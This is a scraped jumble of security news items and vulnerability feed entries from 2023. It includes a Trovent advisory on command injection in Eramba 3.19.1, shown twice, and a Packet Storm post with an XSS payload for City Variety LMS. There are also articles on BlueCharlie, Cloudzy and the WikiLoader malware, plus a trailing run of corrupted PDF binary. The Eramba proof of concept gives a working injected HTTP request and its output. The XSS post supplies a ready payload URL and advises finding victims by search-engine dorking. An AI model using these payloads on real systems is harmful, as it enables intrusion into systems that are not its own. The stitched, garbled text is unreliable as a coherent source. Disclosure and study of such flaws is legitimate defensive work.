An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.

**Authenticated remote code execution in Eramba****Overview**

Advisory ID: TRSA-2303-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2303-01  
Affected product: Eramba  
Affected version: 3.19.1 (Enterprise and Community edition)  
Vendor: Eramba Limited, https://www.eramba.org  
Credits: Trovent Security GmbH, Sergey Makarov

**Detailed description**

Eramba is a web application for managing Governance, Risk, and Compliance (GRC).  
Trovent Security GmbH discovered that the Eramba web application allows remote code execution for authenticated users.  
A possible attacker is able to modify the parameter “path” in the URL “https://hostname/settings/download-test-pdf?path=” to execute arbitrary commands in the context of the user account the application is running in.  
To see the output of the executed command in the HTTP response, debug mode has to be enabled.

Severity: High  
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE ID: CVE-2023-36255  
CWE ID: CWE-94

**Proof of concept**

HTTP request:

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: \[redacted\]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://\[redacted\]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: \*
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER\_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid\_lft forever preferred\_lft forever
    inet6 ::1/128 scope host
       valid\_lft forever preferred\_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER\_UP&gt; mtu 1500 qdisc fq\_codel state UP group default qlen 1000
    link/ether \[redacted\] brd ff:ff:ff:ff:ff:ff
    inet \[redacted\] brd \[redacted\] scope global ens33
       valid\_lft forever preferred\_lft forever
    inet6 \[redacted\] scope link
       valid\_lft forever preferred\_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp\_snappy6426d4231040e1.91046751.html'
'/tmp/knp\_snappy6426d423104587.46971034.pdf'. </title>

\[...\]

**Solution / Workaround**

The vendor released a fixed version of Eramba.

Fixed in version 3.19.2.

**History**

2023-03-31: Vulnerability found  
2023-04-04: Vendor contacted  
2023-04-17: Vendor confirmed vulnerability  
2023-04-20: Vendor released fixed version  
2023-05-25: Trovent verified remediation of the vulnerability  
2023-06-13: CVE ID requested  
2023-07-28: CVE ID received  
2023-08-01: Advisory published

CVE-2023-36255: Security Advisory 2303-01 - Trovent Security GmbH

Control ID IDSecure 4.7.26.0 and prior uses a hardcoded cryptographic key in order to sign and verify JWT session tokens, allowing attackers to sign arbitrary session tokens and bypass authentication.

The iDSecure solution, developed by Control iD, is a software that enables controlling the access of people and vehicles in companies of all sizes.

All management is performed via a web browser and is compatible with the main operating systems and devices (cell phones, tablets and PCs).

The platform enables the configuration of custom access rules and the generation of detailed reports to make your operation easier and more intuitive.

*   Customizable access rules
*   Offline contingency mode
*   100% web, accessed by web browser
*   Integration with cameras (CCTV)
*   Real-time monitoring
*   Customizable reports
*   Modern interface

**Easy to use**

The iDSecure solution was developed with a focus on usability, making the experience of the manager and security professional as intuitive as possible. The local installation of the software combined with the 100% web interface allows the use of any device to manage access.

**Access rules and reports**

The configuration of complex rules based on companies, groups, schedules, types (visitor, third party, resident, etc.) combined with double-entry control, credits and even random searches, guaran- tee the system’s compatibility with the most advanced security requirements.

**Connectivity e integration**

All Control iD access controllers (e.g., iDAccess, iDBox, iDFace and iDBlock) are natively integrated with iDSecure and can be managed easily. In addition, the system allows integration with CCTV cameras and card and/or biometrics registers for PC.

**A version for every need**

In the entry version of iDSecure (Lite), rules validation is done locally on the access control devices. In the Enterprise version, both identification and validation of rules takes place on the server, allowing an unlimited (depending on purchased license) number of users.

**Documents**

*   **iDSecure software download** iDSecure On-Premises  
    
*   **Manual** iDSecure User Manual  
    
*   **PDF documents** Datasheet iDSecure On-Premises

CVE-2023-33371: Access Control Software iDSecure On-Premises| Control iD

A Russa-nexus adversary has been linked to 94 new domains, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities.
Cybersecurity firm Recorded Future linked the new infrastructure to a threat actor it tracks under the name BlueCharlie, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto),

A Russa-nexus adversary has been linked to 94 new domains, suggesting that the group is actively modifying its infrastructure in response to public disclosures about its activities.

Cybersecurity firm Recorded Future linked the new infrastructure to a threat actor it tracks under the name **BlueCharlie**, a hacking crew that's broadly known by the names Blue Callisto, Callisto (or Calisto), COLDRIVER, Star Blizzard (formerly SEABORGIUM), and TA446. BlueCharlie was previously given the temporary designation Threat Activity Group 53 (TAG-53).

"These shifts demonstrate that these threat actors are aware of industry reporting and show a certain level of sophistication in their efforts to obfuscate or modify their activity, aiming to stymie security researchers," the company said in a new technical report shared with The Hacker News.

BlueCharlie is assessed to be affiliated with Russia's Federal Security Service (FSB), with the threat actor linked to phishing campaigns aimed at credential theft by making use of domains that masquerade as the login pages of private sector companies, nuclear research labs, and NGOs involved in Ukraine crisis relief. It's said to be active since at least 2017.

"Calisto collection activities probably contribute to Russian efforts to disrupt Kiev supply-chain for military reinforcements," Sekoia noted earlier this year. "Moreover, Russian intelligence collection about identiﬁed war crime-related evidence is likely conducted to anticipate and build counter narrative on future accusations."

Another report published by NISOS in January 2023 identified potential connections between the group's attack infrastructure to a Russian company that contracts with governmental entities in the country.

"BlueCharlie has carried out persistent phishing and credential theft campaigns that further enable intrusions and data theft," Recorded Future said, adding the actor conducts extensive reconnaissance to increase the likelihood of success of its attacks.

The latest findings reveal that BlueCharlie has moved to a new naming pattern for its domains featuring keywords related to information technology and cryptocurrency, such as cloudrootstorage\[.\]com, directexpressgateway\[.\]com, storagecryptogate\[.\]com, and pdfsecxcloudroute\[.\]com.

Seventy-eight of the 94 new domains are said to have been registered using NameCheap. Some of the other domain registrars used include Porkbun and Regway.

To mitigate threats posed by state-sponsored advanced persistent threat (APT) groups, it's recommended that organizations implement phishing-resistant multi-factor authentication (MFA), disable macros by default in Microsoft Office, and enforce a frequent password reset policy.

"While the group uses relatively common techniques to conduct attacks (such as the use of phishing and a historical reliance on open-source offensive security tools), its likely continued use of these methods, determined posture, and progressive evolution of tactics suggests the group remains formidable and capable," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian Cyber Adversary BlueCharlie Alters Infrastructure in Response to Disclosures

By Deeba Ahmed
Cloudzy is registered in the United States, and its CEO is an Iranian national.
This is a post from HackRead.com Read the original post: Cloud Service Provider Cloudzy Accused of Aiding Ransomware and APTs

**In Summary**

1.  **Report by Halcyon, a Texas-based cybersecurity startup.**
2.  **Cloudzy is registered in the USA but based in Iran.**
3.  **Cloudzy is suspected of providing C&C services to govt hacking groups.**
4.  **CEO Hannan Nozari denies services to cybercriminals.**

The cybersecurity researchers at Halcyon claim that Cloudzy, a cloud service provider, is actively involved in providing command-and-control services to more than 20 hacking groups.

These groups encompass spyware and ransomware operators, as well as state-backed APT groups. Shockingly, approximately 40% – 60% of Cloudzy’s activities are deemed “malicious in nature,” involving activities such as espionage and extortion against its victims.

**The Cloudzy Saga**

Cybersecurity startup Halcyon researchers discovered that an Iranian-run ISP has been “unwittingly” supporting the “ransomware economy” and miscellaneous attack operations by providing C2P (Command-and-Control Providers) services to threat actors.

> Halcyon researchers suggest there is yet another player that is, perhaps unwittingly, supporting the booming ransomware economy and other attack operations: the Command-and-Control Providers (C2P) who sell services to threat actors while assuming a legal business profile.
> 
> Halcyon

Researchers suspect that the company, identified as Cloudzy (formally RouterHosting), sells services to state-sponsored APT (advanced persistent threat) actors and cybercriminals/hackers while keeping a “legal business profile.”

In a research report (PDF) published on August 1st, the Halcyon Research team wrote that Cloudzy is registered in the USA, but it operates from outside of Tehran, Iran, and has virtually no presence in the USA.

An individual identified as Hannan Nozari runs this company, allegedly the founder of another Iranian firm abrNOC. This is based on the finding that eight individuals employed by Cloudzy in Iran also work for abrNOC.

“Halcyon therefore assessed with high confidence that C2P Cloudzy is almost certainly a cutout for the actual hosting company, abrNOC, operating out of Tehran, Iran,” researchers confirmed.

**Cloudzy Supporting Nation-State Actors**

Halcyon researchers conducted a thorough assessment of Cloudzy’s activities over a three-month period before releasing their report. According to their analysis, Cloudzy not only provided command-and-control (C2P) services to threat actors worldwide, disguising them as anonymity-based services, but it also demonstrated an alarming lack of response when informed about malicious activities.

This lack of response strongly suggests that Cloudzy was actively aiding threat actors. Even more concerning is the discovery that its attack infrastructure was closely tied to government-backed hacking groups from various countries, including the following:

*   Iran
*   India
*   China
*   Russia
*   Vietnam
*   Pakistan
*   North Korea

In addition to its government ties, Cloudzy was found to have links with sanctioned spyware vendors, including the Israeli spyware vendor Candiru, who came to the limelight last year for using Chrome 0-day to target journalists.

Cloudzy allegedly also provided its services to infamous ransomware gangs such as Ghost Clown and Space Kook. Notorious cybercriminals were also found to be connected to the service.

Complete list of APT groups that Cloudzy is allegedly providing services to (Screenshot credit: Halcyon )

**Halcyon Shares Shocking Evidence Against Cloudzy**

In its report, Halcyon provided hard facts against Cloudzy. For instance, researchers noted that the company never verified its customers’ identities and got registered with just a working email address. Over half of its hosted servers were discovered supporting malicious activities directly on infrastructure loaned from a dozen different ISPs. 

Moreover, it accepts cryptocurrency payments from users wanting to anonymously use its Remote Desktop Protocol (RDP) Virtual Private Server (VPS) services. Its T&C policy prohibits it from getting involved in illegal activities, but the ISP services provider has allowed abusers to continue operations for a nominal fee.

**Cloudzy’s Response**

Cloudzy’s CEO Nozari has refuted Halcyon’s claims, stating that only 2% of its clients were malicious and that the company cannot be held responsible for having such clients. Talking to Reuters, Nozari explained that he is doing everything to get rid of such clients, but the firm should not be blamed if its services are being abused.

“If you are a knife factory, are you responsible if someone misuses the knife?” the CEO explained his stance in a LinkedIn exchange.

Nozari also explained that his company was registered in the US state of Wyoming because a US domicile is required to register IP addresses in America.

However, Halcyon executive Ryan Golden refuses to back down, claiming that his researchers tracked Cloudzy’s digital footprints by renting its servers and examining the social media pages of its employees before publishing the report.

Cybersecurity firm CrowdStrike stated that it never observed any state-sponsored actor using Cloudzy, but many other cybercriminals use it, and its operational base is definitely unclear.

**RELATED ARTICLES**

1.  Feds seize VPN service used by hackers in cyber attacks
2.  Free VPN Service SuperVPN Exposes 360 Million User Records
3.  Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps
4.  US Warns Firms About North Korean Hackers Posing as IT Workers
5.  Microsoft-Signed Drivers Helped Hackers Breach System Defenses

Cloud Service Provider Cloudzy Accused of Aiding Ransomware and APTs

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://[redacted]/settingsUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP response:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HTTP/1.1 500 Internal Server ErrorDate: Fri, 31 Mar 2023 12:37:55 GMTServer: Apache/2.4.41 (Ubuntu)Access-Control-Allow-Origin: *Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="test.pdf"X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 2033469<!DOCTYPE html><html><head>    <meta charset="utf-8"/>    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>        Error: The exit status code '127' says something went wrong:stderr: "sh: 1: --dpi: not found"stdout: "1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host       valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000    link/ether [redacted] brd ff:ff:ff:ff:ff:ff    inet [redacted] brd [redacted] scope global ens33       valid_lft forever preferred_lft forever    inet6 [redacted] scope link       valid_lft forever preferred_lft forever"command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0' --margin-right '0' --margin-top '0' --orientation 'Landscape' --javascript-delay '1000' '/tmp/knp_snappy6426d4231040e1.91046751.html''/tmp/knp_snappy6426d423104587.46971034.pdf'.    </title>[...]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Solution / Workaround#####################The vendor released a fixed version of Eramba.Fixed in version 3.19.2.History#######2023-03-31: Vulnerability found2023-04-04: Vendor contacted2023-04-17: Vendor confirmed vulnerability2023-04-20: Vendor released fixed version2023-05-25: Trovent verified remediation of the vulnerability2023-06-13: CVE ID requested2023-07-28: CVE ID received2023-08-01: Advisory published

Eramba 3.19.1 Remote Command Execution

A buffer overflow flaw was found in base/gdevdevn.c:1973 in devn_pcx_write_rle() in ghostscript. This issue may allow a local attacker to cause a denial of service via outputting a crafted PDF file for a DEVN device with gs.

CVE-2023-38559

An integer overflow flaw was found in pcl/pl/plfont.c:418 in pl_glyph_name in ghostscript. This issue may allow a local attacker to cause a denial of service via transforming a crafted PCL file to PDF format.

CVE-2023-38560

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

**City Variety LMS 2.2 Cross Site Scripting**

Posted Aug 1, 2023

Authored by indoushka

City Variety LMS version 2.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 1cbbe0f2970a91c54fd6b773983a7f83c535dbf1c4e56f12913660cbe435877e

Download | Favorite | View

**City Variety LMS 2.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : cityvariety LMS 2.2 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.cityvariety.co.th/                                                                                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name=[+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name=Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,831)
*   Arbitrary (16,174)
*   BBS (2,859)
*   Bypass (1,738)
*   CGI (1,026)
*   Code Execution (7,261)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,337)
*   DoS (23,388)
*   Encryption (2,369)
*   Exploit (51,723)
*   File Inclusion (4,219)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (855)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,596)
*   Python (1,532)
*   Remote (30,710)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,335)
*   TCP (2,402)
*   Trojan (687)
*   UDP (889)
*   Virus (664)
*   Vulnerability (31,731)
*   Web (9,634)
*   Whitepaper (3,748)
*   x86 (962)
*   XSS (17,892)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,326)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,644)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,787)
*   UNIX (9,281)
*   UnixWare (186)
*   Windows (6,566)
*   Other

City Variety LMS 2.2 Cross Site Scripting

Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called WikiLoader with an ultimate aim to install a banking trojan, stealer, and spyware called Ursnif (aka Gozi).
"It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade

Organizations in Italy are the target of a new phishing campaign that leverages a new strain of malware called **WikiLoader** with an ultimate aim to install a banking trojan, stealer, and spyware called Ursnif (aka Gozi).

"It is a sophisticated downloader with the objective of installing a second malware payload," Proofpoint said in a technical report. "The malware uses multiple mechanisms to evade detection and was likely developed as a malware that can be rented out to select cybercriminal threat actors."

WikiLoader is so named due to the malware making a request to Wikipedia and checking that the response has the string "The Free."

The enterprise security firm said it first detected the malware in the wild on December 27, 2022, in connection with an intrusion set mounted by a threat actor it tracks as TA544, which is also known as Bamboo Spider and Zeus Panda.

The campaigns are centered around the use of emails containing either Microsoft Excel, Microsoft OneNote, or PDF attachments that act as a lure to deploy the downloader, which is subsequently used to install Ursnif.

In a sign that WikiLoader is shared among multiple cybercrime groups, the threat actor dubbed TA551 (aka Shathak) has also been observed employing the malware as of late March 2023.

Recent TA544 campaigns detected in mid-July 2023 have utilized accounting themes to propagate PDF attachments with URLs that, when clicked, lead to the delivery of a ZIP archive file, which, in turn, packs a JavaScript file designed to download and execute WikiLoader.

WikiLoader is heavily obfuscated and comes with evasive maneuvers to bypass endpoint security software and avoid detonation in automated analysis environments. It's also engineered to retrieve and run a shellcode payload hosted on Discord, which is ultimately used to launch Ursnif.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"It is currently under active development, and its authors appear to make regular changes to try and remain undetected and fly under the radar," Selena Larson, senior threat intelligence analyst at Proofpoint, said in a statement.

"It is likely more criminal threat actors will use this, especially those known as initial access brokers (IABs) that conduct regular activity that leads to ransomware. Defenders should be aware of this new malware and activities involved in payload delivery, and take steps to protect their organizations against exploitation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Renting WikiLoader to Target Italian Organizations with Banking Trojan

Precisely Spectrum Spatial Analyst 20.01 is vulnerable to Server-Side Request Forgery (SSRF).

%PDF-1.4 %���� 13 0 obj <> stream xڭVKs�0��W��zY��t(��3m3�l�1�G�ǔ�{VR�j���d��s�\]���\]�!������J�#d����Mn�6yH8��w�q���9\\�>���#�Wkg��y׸�~�x'�>uɕ;�ěp&�J�ia ��G��/��Urr�AX�P��2�\[X5ɛ�\]�����\]1VE ڢ~Ʒ�h,S\[ø����c��iŸ�������%g�ݤ&xŐ�ҫȘV�躬�b(�k7��3�p����Xj����\\m�6�zj�v�u׎E�P�wq�L�&�\]O2Ҝ0�L���M#�d�yK�r�T��R&�$��M��.����O��Ε�+�0�A�KEX{%���)���� H�3%r�f^�W���U���T2� v�u��|)�x@&���\]�\\1��6h�C� �(�� �D�9�+�7�לЮ�Y�\\t���L��ݦK�+���02C���;�%�)��}�?�)���F35Da��ʹُz<�7�Iӡ���j�+��֕t3�%w��v0l���x�e=\*C�O�x5��, l��<��tP�\`�eh��ݢ��Ul���+�,5:f�ZT �&�/�#�8?#ұ<�#^+OL�맭��i����E�\]^���-T�����T�������Gw��n&�,�qX���;�aVHcY���ZeT�� �D����4P�&>:9��L����l����'��8��r�p�����L����k��!�C\*ey�ɝe\`f��~$�J˸ :�ȩmYn!<���� ���ӣ�E�3<���渌��(�-�B��3���c�ό�٠E\_��;-� endstream endobj 14 0 obj 825 endobj 23 0 obj <> stream xڝX\]��6}���c��DRA��dӤS4E�1�Ef����ĒǙ��{(�^I�������ǽ<��C �>�\[�+���Lp#s�7�?��v�j�z�F2e���J�GL2m��rn�g���W�������?\_RZn A�.{��7äR����c�˲��U;�:\]\`'�kí6:��$8'����uK0�q��S̩jnX�u�н���o�|�Yn�v�B��YT9τ!���87;U����X��۶��{Wܲ�ﯺt��I.\]����2Ns�����CH�r��\]�������g��6����2˽sw�X�UQ��MQ�w=#!d�E�VB . ��d- ) �!Cu�L{��������¡�چ���S�#VM�"9̈́�>\_��R���\\�,?/�!�v�U)��Rj2���\]��ز�a\]���x����9�)�q!��յ�

Tag

#pdf